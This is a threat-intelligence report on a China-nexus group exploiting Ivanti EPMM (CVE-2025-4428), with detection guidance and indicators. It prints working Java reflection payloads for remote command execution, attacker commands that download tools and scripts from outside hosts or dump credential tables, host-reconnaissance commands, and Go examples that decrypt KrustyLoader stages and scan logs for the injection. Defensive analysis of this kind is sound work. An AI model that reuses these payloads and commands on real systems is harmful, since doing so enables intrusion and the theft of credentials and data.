Arda Büyükkaya
May 21, 2025

China-Nexus Threat Actor Actively Exploiting Ivanti Endpoint Manager Mobile (CVE-2025-4428) Vulnerability

Intelligence Research

Executive Summary 

On Thursday, May 15, 2025, Ivanti disclosed two critical vulnerabilities - CVE-2025-4427 and CVE-2025-4428 - affecting Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier. [1] These vulnerabilities can be chained to achieve unauthenticated remote code execution (RCE) on exposed systems.  

EclecticIQ analysts observed active exploitation of this vulnerability chain in the wild, targeting internet-facing Ivanti EPMM deployments. The earliest observed exploitation activity dates back to May 15, 2025. Targeted organizations span critical sectors including healthcare, telecommunications, aviation, municipal government, finance, and defense across Europe, North America, and the Asia-Pacific region.

Figure 1 - EclecticIQ graph view showing activities of Ivanti EPMM intrusions.

Based on the tactics, techniques, and procedures (TTPs) observed, EclecticIQ attributes this activity with high confidence to UNC5221 [2], a China-nexus espionage group previously linked to zero-day exploitation of edge network appliances since at least 2023 [3]. 

UNC5221 demonstrates a deep understanding of EPMM’s internal architecture, repurposing legitimate system components for covert data exfiltration. This includes the extraction of large volumes of personally identifiable information (PII), authentication credentials, and other sensitive data used for lateral movement within compromised environments. 

Given EPMM's role in managing and pushing configurations to enterprise mobile devices, a successful exploitation could allow threat actors to remotely access, manipulate, or compromise thousands of managed devices across an organization. 

Ivanti has released patches addressing both vulnerabilities, and customers are strongly urged to follow the guidance outlined in the official security advisory to secure their environments as soon as possible. 

Initial Compromise via Unauthenticated RCE Exploit 

EclecticIQ analysts observed that threat actors gained initial access by exploiting an unauthenticated RCE vulnerability in Ivanti EPMM deployments. The exploitation targeted the /mifs/rs/api/v2/ endpoint, where the ?format= parameter was used to send malicious remote commands.

Figure 2 - Base64-encoded payload embedded in a GET request

Threat actors use HTTP GET requests containing Java-based commands. These requests are designed to execute external malicious processes on compromised systems:

    • ${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("REMOTE-COMMAND").waitFor()}

This command leverages Java Reflection to invoke Runtime.getRuntime().exec(), enabling arbitrary command execution. The use of .waitFor() ensures that the Java thread remains active until the external process completes.   

Figure 3 shows an example command sent to vulnerable Ivanti EPMM instances to obtain an interactive reverse shell; here .waitFor() keeps the thread from terminating so that the communication channel between the attacker and the victim system stays open.

Figure 3 - Java payload spawning a reverse shell to 64.52.80[.]21:4444 using /bin/bash

Additionally, the threat actor used another reflective Java expression to read the executed remote command output coming from the victim system:  

  • ${"".getClass().forName("java.util.Scanner").getConstructor("".getClass().forName("java.io.InputStream")).newInstance("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("REMOTE-COMMAND").getInputStream()).useDelimiter("\\A").next()}

This expression constructs a Scanner to read the InputStream of the executed process, allowing the attacker to capture the command's output. 

By chaining these techniques, the threat actor was able to execute malicious commands and immediately retrieve their results, forming a reliable command-and-control (C2) mechanism using server-side Java injection. 

KrustyLoader for Persistent Remote Access

EclecticIQ analysts observed the execution of KrustyLoader [4] malware within compromised Ivanti EPMM systems. Threat actors associated with the UNC5221 group exploited these systems and utilized publicly accessible Amazon AWS S3 buckets to deliver final payloads.  

Threat actors used built-in Linux utilities such as wget, curl, and fetch to download a malicious payload, save it to /tmp/1, and execute it to gain persistent access to the target environment.

Figure 4 - Obfuscated Bash script downloading and executing a payload from an AWS S3 URL using wget, curl, or fetch, followed by permission change and execution.

AWS S3 Buckets Abused to Deliver KrustyLoader:

  • openrbf.s3.amazonaws.com 
  • tnegadge.s3.amazonaws.com 
  • fconnect.s3.amazonaws.com 
  • trkbucket.s3.amazonaws.com 
  • the-mentor.s3.amazonaws.com 
  • tkshopqd.s3.amazonaws.com 

Once installed, KrustyLoader retrieves a second-stage payload — an AES-128-CFB encrypted version of the Sliver backdoor [5]. It then decrypts this payload using a hardcoded key and initialization vector, and injects it directly into memory as shellcode, allowing threat actors to establish persistent remote access on the compromised system. 

Figure 5 - Embedded ciphertext within a binary file.

KrustyLoader embeds an encrypted URL pointing to the actual backdoor, which is a Sliver C2 implant. The embedded URL is hidden within the binary as a hex string, then XOR encrypted (key: 0x49), and finally encrypted using AES-128 in CFB mode with a hardcoded key and IV.  

Figure 6 - Decryption process revealing the malicious URL, using CyberChef with Hex decoding, XOR with 0x49, and AES decryption (CFB mode) with the specified key and IV.

In one of the analysed samples, the decryption revealed the staging URL:  

  • http://abbeglasses.s3.amazonaws[.]com/dSn9tM 

The loader downloads this file, which is itself an AES-encrypted ELF binary, and decrypts it using the same AES key (95cd9006ca055abae4f87563cfb0fb0b) and initialization vector (2c210dd19e392409567546d06e676070).

The resulting payload is loaded directly into memory and executed as shellcode - enabling covert, persistent remote access for the threat actor, even after patching of the original vulnerabilities on the host system. 
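The three-layer unwrapping described above, written out as an added example that is not part of the report or of any EclecticIQ or Ivanti tooling. It is plain Go using the standard library's AES-CFB implementation and the key and IV quoted above. The URL it encodes and decodes is a constructed placeholder, and the forward-direction EncodeEmbeddedURL helper exists only so the example can produce a blob to unwrap; it is not loader behaviour. DecryptSecondStage applies the same key and IV to a downloaded stage and checks for the ELF header the report says the stage carries, so a mismatched or truncated sample is reported instead of being handed on.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/hex"
	"errors"
	"fmt"
)

// Key and IV quoted in the report for the analysed KrustyLoader sample.
const (
	krustyKeyHex = "95cd9006ca055abae4f87563cfb0fb0b"
	krustyIVHex  = "2c210dd19e392409567546d06e676070"
	xorKey       = 0x49 // single-byte XOR layer wrapped around the AES ciphertext
)

var elfMagic = []byte{0x7f, 'E', 'L', 'F'}

// cfb runs AES-128-CFB over data with the sample's key and IV, in either direction.
func cfb(data []byte, encrypt bool) ([]byte, error) {
	key, _ := hex.DecodeString(krustyKeyHex) // constants above are known-good hex
	iv, _ := hex.DecodeString(krustyIVHex)
	block, err := aes.NewCipher(key) // a 16-byte key selects AES-128
	if err != nil {
		return nil, err
	}
	stream := cipher.NewCFBDecrypter(block, iv)
	if encrypt {
		stream = cipher.NewCFBEncrypter(block, iv)
	}
	out := make([]byte, len(data))
	stream.XORKeyStream(out, data)
	return out, nil
}

// DecodeEmbeddedURL reverses the three layers in the order the CyberChef recipe
// applies them: hex decode, XOR with 0x49, then AES-128-CFB decrypt.
func DecodeEmbeddedURL(hexBlob string) (string, error) {
	raw, err := hex.DecodeString(hexBlob)
	if err != nil {
		return "", fmt.Errorf("hex layer: %w", err)
	}
	if len(raw) == 0 {
		return "", errors.New("empty blob")
	}
	for i := range raw {
		raw[i] ^= xorKey
	}
	plain, err := cfb(raw, false)
	if err != nil {
		return "", err
	}
	return string(plain), nil
}

// DecryptSecondStage decrypts the downloaded stage with the same key and IV and
// insists on an ELF header, so a wrong key or a truncated download is reported
// rather than treated as a valid payload.
func DecryptSecondStage(ciphertext []byte) ([]byte, error) {
	if len(ciphertext) < len(elfMagic) {
		return nil, errors.New("stage too short to be an ELF image")
	}
	plain, err := cfb(ciphertext, false)
	if err != nil {
		return nil, err
	}
	if !bytes.HasPrefix(plain, elfMagic) {
		return nil, errors.New("decrypted stage lacks the ELF magic: wrong key/IV or not this sample")
	}
	return plain, nil
}

// EncodeEmbeddedURL applies the layers in the forward direction. It is only here so
// the example can build a constructed blob to decode; the loader never does this.
func EncodeEmbeddedURL(plain string) (string, error) {
	ct, err := cfb([]byte(plain), true)
	if err != nil {
		return "", err
	}
	for i := range ct {
		ct[i] ^= xorKey
	}
	return hex.EncodeToString(ct), nil
}

func main() {
	// Constructed placeholder URL, not the staging URL from the report.
	blob, _ := EncodeEmbeddedURL("http://bucket.example/stage")
	decoded, err := DecodeEmbeddedURL(blob)
	fmt.Println(decoded, err)
}
```

To apply this to a real sample, pass the hex string lifted from the binary (Figure 5) to DecodeEmbeddedURL and the raw download to DecryptSecondStage; a sample built with a different key or IV will fail the ELF check rather than produce silently wrong output.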

Hardcoded MySQL Credentials in Ivanti EPMM Abused to Exfiltrate Sensitive Data  

EclecticIQ analysts observed that the mifs database is a primary target for espionage and data exfiltration operations by China-nexus actors. After initial compromise, threat actors leveraged hardcoded MySQL database credentials stored in /mi/files/system/.mifpp to access the backend mifs database in Ivanti EPMM systems [6].

Figure 7 - Directory listing reveals sensitive configuration and credential files (e.g., .mifpp, .spp2, .mrpp) with hardcoded usernames and passwords.

This database holds core operational data for Ivanti EPMM. Unauthorized access to the mifs database gives threat actors visibility into managed mobile devices (including IMEI, phone numbers, location, SIM details etc.), LDAP users, and Office 365 refresh and access tokens. 

The command below was executed on compromised Ivanti EPMM systems to export LDAP server details, very likely for Active Directory reconnaissance:

  • /usr/bin/mysqldump --defaults-extra-file=/mi/files/system/.mifpp mifs mifs_ldap_server_config 
  Tables also dumped from the mifs database: 
    • mi_user 
    • mifs_ldap_users 

In some incidents, threat actors issued scripted SQL queries to automate these steps, downloading a Bash script from dpaste[.]com and dropping it under /tmp/h or /tmp/y for execution.

The command below was observed on multiple compromised systems, downloading that script with wget:

  • wget https://dpaste[.]com/9MQEJ6VYR.txt -O /tmp/h 

The Bash script was executed to dump Office 365 integration tokens and credentials from the office365_credentials table, which could be used by the threat actor to gain unauthorized access to Microsoft Azure Entra ID services, including Office 365 email and SharePoint cloud storage.

Threat actors also exfiltrated metadata about managed mobile devices by dumping the mi_device_detail table; this data likely supports China-nexus cyber espionage operations targeting high-value individuals within public institutions, including government agencies, or in the private sector.

Figure 8 - Script extracts heap dumps of Tomcat Java processes and searches for LDAP credentials by combining jcmd, mysqldump, and strings.

Threat actors dumped heap memory from Tomcat Java processes using jcmd, then parsed the dumped data. These memory artifacts were stored under /tmp, for staging the final exfiltration phase.   

To carry out this dump-and-exfiltration process, threat actors repurposed Ivanti EPMM's existing functions and its insecurely stored MySQL credentials to escalate access and exfiltrate large volumes of sensitive data from the network.

Reverse Proxy Tool FRP Enables Network Reconnaissance and Lateral Movement

EclecticIQ analysts observed the installation of FRP (Fast Reverse Proxy) [7], an open-source reverse proxy tool frequently leveraged by China-nexus associated threat actors [8].

In the Ivanti EPMM intrusions, threat actors executed the following remote command to download an FRP binary from the attacker-controlled IP address (103.244.88[.]125) and drop it at the local path /tmp/.alog on the compromised host.

  • wget http://103.244.88[.]125:8080/frpc -o /tmp/.alog 

Figure 9 - Log entry showing remote code execution via a vulnerable format parameter.

Once deployed, FRP lets the attacker establish a reverse SOCKS5 proxy, providing persistent access to the internal network. From this foothold, threat actors can conduct network reconnaissance using tools such as Nmap as if they were operating physically inside the internal environment. This is typically followed by lateral movement to other internal systems, enabling broader access and deeper compromise of the network.

Reconnaissance and Staging Activity Observed in Ivanti EPMM Exploitation  

During analysis of access logs from a compromised Ivanti EPMM instance, EclecticIQ analysts observed threat actors conducting host reconnaissance using obfuscated shell commands.

Following the reconnaissance phase, the actor issued commands to download and execute a KrustyLoader payload from an AWS S3 bucket (tkshopqd.s3.amazonaws.com) that was likely compromised by the threat actor. The binary was retrieved via one of several methods (wget, curl, fetch), saved to /tmp/1, marked executable, and then launched on the system.

The attackers first executed a sequence of commands via sh -c $@|bash 0, writing the output of various system enumeration commands to fake JPG files within the web-accessible directory, a likely attempt to evade detection by security tools and human analysts:  

  • /mi/tomcat/webapps/mifs/images/ 

Figure 10 - KrustyLoader malware installation via Bash commands, capturing system reconnaissance output to .jpg files and downloading a payload from an AWS S3 bucket to /tmp/1.

Examples of executed commands include: 

  • whoami, id, hostname, uname -a 
  • Accessing sensitive files like /etc/passwd, /etc/shadow, /etc/hosts, /etc/resolv.conf 
  • Listing directory contents of /opt, /mnt, /var 
  • Dumping user and system activity via last -n 30, ps -ef, crontab -l, and ~/.bash_history 
  • Network enumeration with ip add and netstat -tenp 

The actor saved each output temporarily as a file (e.g., whoami > /mi/tomcat/webapps/mifs/images/Hq8weo.jpg) and then immediately deleted it using rm -rf. This pattern suggests the actor was retrieving host-level intelligence in real time, potentially using HTTP GET requests to exfiltrate the data before wiping the artifacts. 
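As an added example that is not from the report, from Ivanti or from EclecticIQ, the following Go program triages the images directory named above: it flags any file with a .jpg or .jpeg name whose bytes do not begin with the JPEG marker and shows what was actually written into it. Because the actor deleted each file within moments, a scan of this kind only catches what was left behind; a file-creation audit rule (auditd or inotify) on the directory is what catches the short-lived ones. The default directory and the Hq8weo.jpg name in the test come from the report; the file contents used in the test are constructed.

```go
package main

import (
	"bytes"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// jpegMagic is the SOI marker every JPEG file starts with.
var jpegMagic = []byte{0xFF, 0xD8, 0xFF}

// Suspect is a file whose .jpg/.jpeg name is not backed by JPEG content.
type Suspect struct {
	Path    string
	Preview string // printable rendering of the first bytes, e.g. "uid=0(root)..."
}

// IsFakeJPEG reports whether head (the start of a file) lacks the JPEG marker.
func IsFakeJPEG(head []byte) bool {
	return !bytes.HasPrefix(head, jpegMagic)
}

// FindFakeImages walks dir and returns every *.jpg / *.jpeg whose bytes are not JPEG.
func FindFakeImages(dir string) ([]Suspect, error) {
	var found []Suspect
	err := filepath.WalkDir(dir, func(p string, d os.DirEntry, walkErr error) error {
		if walkErr != nil {
			return walkErr
		}
		if d.IsDir() {
			return nil
		}
		ext := strings.ToLower(filepath.Ext(p))
		if ext != ".jpg" && ext != ".jpeg" {
			return nil
		}
		f, err := os.Open(p)
		if err != nil {
			return err
		}
		head := make([]byte, 64)
		n, _ := f.Read(head) // an empty file reads 0 bytes and is flagged too
		f.Close()
		head = head[:n]
		if IsFakeJPEG(head) {
			found = append(found, Suspect{Path: p, Preview: printable(head)})
		}
		return nil
	})
	return found, err
}

// printable replaces non-printable bytes so command output can be shown on one line.
func printable(b []byte) string {
	var sb strings.Builder
	for _, c := range b {
		if c >= 0x20 && c < 0x7f {
			sb.WriteByte(c)
		} else {
			sb.WriteByte('.')
		}
	}
	return sb.String()
}

func main() {
	dir := "/mi/tomcat/webapps/mifs/images/" // directory named in the report
	if len(os.Args) > 1 {
		dir = os.Args[1]
	}
	found, err := FindFakeImages(dir)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	for _, s := range found {
		fmt.Printf("%s is not a JPEG; starts with: %s\n", s.Path, s.Preview)
	}
}
```

Run it with no arguments on an EPMM host to scan the report's directory, or pass another path to check a copied image of the directory offline.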

China-Nexus Attribution Confidence and Historical Context  

EclecticIQ assesses with high confidence that the observed Ivanti EPMM exploitation activity is very likely linked to UNC5221, a China-nexus cyber-espionage group. Infrastructure reuse and observed tradecraft closely align with previous campaigns attributed to this actor.

EclecticIQ analysts identified that the IP address 27.25.148[.]183, hosted in China, was previously used in SAP NetWeaver exploitation campaigns [9] attributed to UNC5221 in early May 2025. Threat actors reused the same infrastructure in the Ivanti EPMM intrusion. Post-exploitation logs show this IP was used to download and execute malicious Bash scripts and to establish a reverse shell over TCP port 5666.

Figure 11 - Log entries showing remote code execution attempts via vulnerable format parameters to download (curl) and execute a shell script (dl.sh), followed by a reverse shell to attacker IP 27.25.148[.]183 on port 5666.

The reuse of infrastructure and consistent exploitation tradecraft strongly indicates continuity in UNC5221's operations. The group is known for targeting internet-facing enterprise applications and leveraging them for initial access and persistent footholds, consistent with observed patterns in the Ivanti EPMM intrusion.

Auto-Color Backdoor C2 Observed in Ivanti EPMM Intrusions 

In addition, analysts observed a likely link to Auto-Color, a Linux backdoor first reported by Palo Alto Networks in late 2024. [10]  

The address 146.70.87[.]67:45020, previously associated with Auto-Color command-and-control infrastructure, appeared in outbound connectivity tests issued via curl immediately after exploitation of Ivanti EPMM servers. This behaviour is consistent with Auto-Color's staging and beaconing patterns. Taken together, these indicators very likely link this activity to China-nexus operations.

Victimology of Ivanti EPMM Intrusions

Intrusions targeting Ivanti EPMM show a global pattern, with threat actors linked to China breaching organizations across diverse industries and regions. 

Affected sectors include: 

Europe:
  • Municipal governance agency in a major Scandinavian capital. 
  • Local government authority in the United Kingdom. 
  • UK-based healthcare trust providing hospital and clinical services in London. 
  • UK healthcare institution involved in national health service operations. 
  • Federal research institute in Germany specializing in agricultural and plant science. 
  • German legal and insurance services firm offering protection products. 
  • Largest German telecommunications provider and its managed IT service subsidiaries. 
  • German manufacturer specializing in industrial rotary technology. 
  • Irish-based aerospace leasing company serving global airline clients. 
North America:
  • National healthcare and pharmaceutical provider focused on long-term care services. 
  • U.S. medical device manufacturer specializing in vascular access and oncology products. 
  • Major foodservice distributor catering to restaurants and retail operations. 
  • U.S. transportation infrastructure entity managing airport systems in Houston. 
  • Cybersecurity firm specializing in mobile threat defense and enterprise device security. 
  • U.S.-based firearms manufacturer serving both civilian and defense markets. 
Asia-Pacific:
  • Multinational bank operating in South Korea, with a strong presence in commercial and consumer financial services. 
  • Japanese automotive parts supplier known for advanced electronics and powertrain systems. 

Due to the nature of the Ivanti Endpoint Manager Mobile (EPMM) platform—which centrally manages mobile devices within enterprise or government environments—the compromise of these systems exposes a rich set of sensitive data. This includes real-time device telemetry, IMEIs, phone numbers, authentication tokens, LDAP mappings, and access credentials tied to Microsoft 365 and enterprise identity providers. 

EclecticIQ analysts assess that the Ivanti EPMM intrusion by UNC5221 likely reflects the strategic intent of China-nexus actors to repurpose exfiltrated data in support of state-aligned cyber-enabled espionage objectives, targeting high-value individuals and institutional assets to advance the intelligence-gathering priorities of the People's Republic of China (PRC).

Detection Strategies 

In Ivanti Endpoint Manager Mobile (EPMM), HTTP request logs are stored in: 

  • /mi/tomcat/logs/access-logs.* 

These are Tomcat access logs that record all HTTP traffic processed by the EPMM server and are critical for detecting web-based attacks, including remote code execution (RCE) attempts. 

Regex-Based Detection for Remote Code Execution: 

To identify suspicious Java-based remote command execution attempts via the format parameter, use the following regular expression to search within access logs: 

  • format=.*?exec(?:%28|\()(['"]|%27)(.+?)\1 

This pattern matches attempts to invoke Java’s Runtime.exec() using reflection techniques commonly seen in RCE payloads. 
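The same check applied to constructed Tomcat access-log lines, as an added example that is not part of the report and not EclecticIQ or Ivanti tooling. Go's RE2 engine has no backreferences, so the \1 in the pattern above is replaced by percent-decoding the request target first and then matching either a double- or single-quoted exec() argument, which covers the same %28 and %27 variants the pattern allows for. The log lines, client IPs and the short commands inside them are constructed for this example; the endpoint and parameter name are the ones the report names.

```go
package main

import (
	"bufio"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Constructed Tomcat access-log lines (common log format). Lines 1 and 3 carry the
// reflective Runtime.exec() expression in the format parameter, percent-encoded the
// way Tomcat logs the raw request target; line 2 is ordinary API traffic.
const sampleAccessLog = `203.0.113.10 - - [15/May/2025:10:21:33 +0000] "GET /mifs/rs/api/v2/?format=%24%7B%22%22.getClass%28%29.forName%28%22java.lang.Runtime%22%29.getMethod%28%22getRuntime%22%29.invoke%28null%29.exec%28%22id%22%29.waitFor%28%29%7D HTTP/1.1" 200 512
198.51.100.7 - - [15/May/2025:10:22:01 +0000] "GET /mifs/rs/api/v2/?format=json HTTP/1.1" 401 0
203.0.113.10 - - [15/May/2025:10:23:48 +0000] "GET /mifs/rs/api/v2/?format=%24%7B%22%22.getClass%28%29.forName%28%22java.lang.Runtime%22%29.getMethod%28%22getRuntime%22%29.invoke%28null%29.exec%28%27whoami%27%29.waitFor%28%29%7D HTTP/1.1" 200 512`

// requestRe pulls the request target out of the quoted request line.
var requestRe = regexp.MustCompile(`"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) ([^ "]+) HTTP/[0-9.]+"`)

// execRe is the report's pattern without the backreference: after percent-decoding,
// the exec() argument is either "..." or '...'.
var execRe = regexp.MustCompile(`(?i)format=.*?exec\((?:"([^"]*)"|'([^']*)')`)

// Hit records one matching request.
type Hit struct {
	Line    int    // 1-based line number in the log
	Client  string // first field of the access-log line
	Command string // argument handed to Runtime.exec()
}

// ScanAccessLog returns every request whose format parameter carries an exec() call.
func ScanAccessLog(log string) []Hit {
	var hits []Hit
	sc := bufio.NewScanner(strings.NewReader(log))
	// Injected requests can be long; lift the scanner's 64 KiB default line limit.
	sc.Buffer(make([]byte, 0, 1<<20), 1<<20)
	n := 0
	for sc.Scan() {
		n++
		line := sc.Text()
		m := requestRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		target := m[1]
		if dec, err := url.PathUnescape(target); err == nil {
			target = dec // a malformed escape sequence leaves the raw target in place
		}
		em := execRe.FindStringSubmatch(target)
		if em == nil {
			continue
		}
		cmd := em[1]
		if cmd == "" {
			cmd = em[2]
		}
		hits = append(hits, Hit{Line: n, Client: strings.Fields(line)[0], Command: cmd})
	}
	return hits
}

func main() {
	for _, h := range ScanAccessLog(sampleAccessLog) {
		fmt.Printf("line %d: %s sent exec(%q) via the format parameter\n", h.Line, h.Client, h.Command)
	}
}
```

Decoding before matching is the important design choice: a payload sent with %28/%27, with literal quotes, or with a mix of both still lands on the same decoded text, and the extracted Command field is what an analyst wants to pivot on next (the reverse-shell address in Figure 3, the wget/curl line in Figure 4).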

File System Monitoring for Suspicious File Activity 

Monitor high-risk directories for unauthorized file uploads, executable drops, or unusual script activity.

Directories to watch: 

  • /tmp/ 
  • /var/tmp/ 
  • /mi/tomcat/webapps/mifs/images/ 

Detection Tips: 

  • Monitor for binaries or scripts being executed directly from these directories. 
  • Alert on common Linux tools used for downloading malicious files: 
    • wget, curl, fetch 

Example suspicious command pattern: 

  • wget http://malicious[.]domain/payload -O /tmp/<filename> 

Log and Alert Recommendations 

  • Ingest and parse access logs and process creation logs in your SIEM/XDR platform. 
  • Set alerts for: 
    • Use of suspicious parameters in HTTP requests (?format= followed by encoded commands) 
    • File creations in /tmp or /var/tmp by web service processes (e.g., Tomcat, Java) 
    • Execution of binaries from these directories 

Indicators of Compromise (IOCs) 

IP Addresses 

  • 103.244.88[.]125 – Used to host and deliver the FRP (Fast Reverse Proxy) binary. 
  • 27.25.148[.]183 – Hosted in China, reused from prior SAP NetWeaver exploitation campaigns attributed to UNC5221. 
  • 146.70.87[.]67:45020 – Associated with Auto-Color Linux backdoor command-and-control infrastructure. 
  • 124.223.202[.]90 – Hosted in China (Tencent Cloud); serves as the backend for the Yak Bridge service used to receive DNS callback traffic via ns1.cybertunnel[.]run.  

KrustyLoader Samples 

  • 44c4a0d1826369993d1a2c4fcc00a86bf45723342cfd9f3a8b44b673eee6733a 
  • 7a4e0eb5fbab9709c8f42beb322a5dfefbc4ec5f914938a8862f8e26a31d30a5 
  • f34db4ea8ec3c2cbe53fde3d73229ccaa2a9e7168cd96d9a49bf89adef5ab47c 
  • 150ccd3b24a1b40630e46300100a3f810aa7a6badeb6806b59ed6ba7bafb7b21 

Decrypted Sliver C2 Sample from KrustyLoader 

  • 29ae4fa86329bf6d0955020319b618d4c183d433830187b80979d392bf159768 

Linux Bash Script Used to Dump MySQL Database 

  • 64764ffe4b1e4fc5b9fe27b513e02f0392f659c4e033d23a4ba7a3b7f20c6d30 
  • b422645db18e95aa0b4daaf5277417b73322bed306f42385ecfd6d49be26bfab 

Malicious Domains 

Used to deliver KrustyLoader payloads: 

  • openrbf.s3.amazonaws[.]com 
  • tnegadge.s3.amazonaws[.]com 
  • fconnect.s3.amazonaws[.]com 
  • trkbucket.s3.amazonaws[.]com 
  • the-mentor.s3.amazonaws[.]com 
  • tkshopqd.s3.amazonaws[.]com 

Staging URL for encrypted Sliver backdoor: 

  • http://abbeglasses.s3.amazonaws[.]com/dSn9tM 

Pastebin-style hosting for malicious script: 

  • https://dpaste[.]com/9MQEJ6VYR.txt 

Used to verify successful RCE via DNS callback: 

  • ns1.cybertunnel[.]run - Functions as a nameserver (NS) for the dnstunnel[.]run DNSLog system, used in DNS tunnelling operations associated with the Yaklang/Yakit toolset. 

MITRE ATT&CK Matrix 

References

[1] “Security Advisory Ivanti Endpoint Manager Mobile (EPMM) May 2025 (CVE-2025-4427 and CVE-2025-4428).” Accessed: May 19, 2025. [Online]. Available: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?language=en_US

[2] “UNC5221, UTA0178 - Threat Group Cards: A Threat Actor Encyclopedia.” Accessed: May 20, 2025. [Online]. Available: https://apt.etda.or.th/cgi-bin/showcard.cgi?g=UNC5221%2C%20UTA0178&n=1 

[3] “Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457),” Google Cloud Blog. Accessed: May 21, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability

[4] “KrustyLoader (Malware Family).” Accessed: May 19, 2025. [Online]. Available: https://malpedia.caad.fkie.fraunhofer.de/details/elf.krustyloader

[5] BishopFox/sliver. (May 21, 2025). Go. Bishop Fox. Accessed: May 21, 2025. [Online]. Available: https://github.com/BishopFox/sliver

[6] M. Elyassa, “Red teaming like an APT, a MobileIron 0-day exploit chain”. 

[7] fatedier, fatedier/frp. (May 21, 2025). Go. Accessed: May 21, 2025. [Online]. Available: https://github.com/fatedier/frp

[8] “Chinese Threat Actor Used Modified Cobalt Strike Variant to Attack Taiwanese Critical Infrastructure.” Accessed: May 21, 2025. [Online]. Available: https://blog.eclecticiq.com/chinese-threat-actor-used-modified-cobalt-strike-variant-to-attack-taiwanese-critical-infrastructure

[9] “China-Nexus Nation State Actors Exploit SAP NetWeaver (CVE-2025-31324) to Target Critical Infrastructures.” Accessed: May 19, 2025. [Online]. Available: https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures

[10] A. Armstrong, “Auto-Color: An Emerging and Evasive Linux Backdoor,” Unit 42. Accessed: May 20, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/